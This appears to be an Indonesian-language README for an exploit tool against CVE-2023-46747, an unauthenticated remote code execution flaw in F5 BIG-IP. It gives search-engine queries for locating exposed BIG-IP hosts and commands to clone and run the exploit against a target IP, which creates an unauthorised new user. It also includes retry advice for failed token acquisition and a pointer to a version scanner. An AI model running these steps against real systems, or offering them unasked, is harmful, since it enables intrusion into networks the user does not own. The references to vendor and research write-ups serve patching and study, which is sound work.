CVE 2023 46747 RCE

 (title="BIG-IP®" || icon_hash="-335242539")

 title:"BIG-IP®"

https://my.f5.com/manage/s/article/K000137353

1. Saat ini, pengguna di sini hanya admin :

2. Jalankan skrip:

 git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
# python CVE-2023-46747-RCE.py -u https://192.168.161.190 -p http://127.0.0.1:7890

Perintah yang berhasil dijalankan:

3. Pengguna baru berhasil dibuat tanpa otorisasi di sini:

Eksploitasi gagal di beberapa versi, referensi: https://twitter.com/joel_land/status/1729147886615818732.

1. T: Akuisisi token gagal?
   J: Tidak dapat dikatakan bahwa tidak boleh ada kerentanan di situs pengujian, karena membuat pengguna tanpa otorisasi tidak 100% berhasil. Terkadang Anda tidak membuat pengguna pada langkah pertama karena beberapa alasan, sehingga token pada langkah kedua tidak dapat diperoleh. Oleh karena itu, saran saya adalah mencoba beberapa kali lagi. Jika tidak berhasil, mungkin berarti memang tidak ada kerentanan.

Anda dapat menggunakan skrip ini https://github.com/BishopFox/bigip-scanner untuk mengumpulkan informasi versi F5 BIG-IP. Itu bagus!

penemuan proyek/templat inti#8500
https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747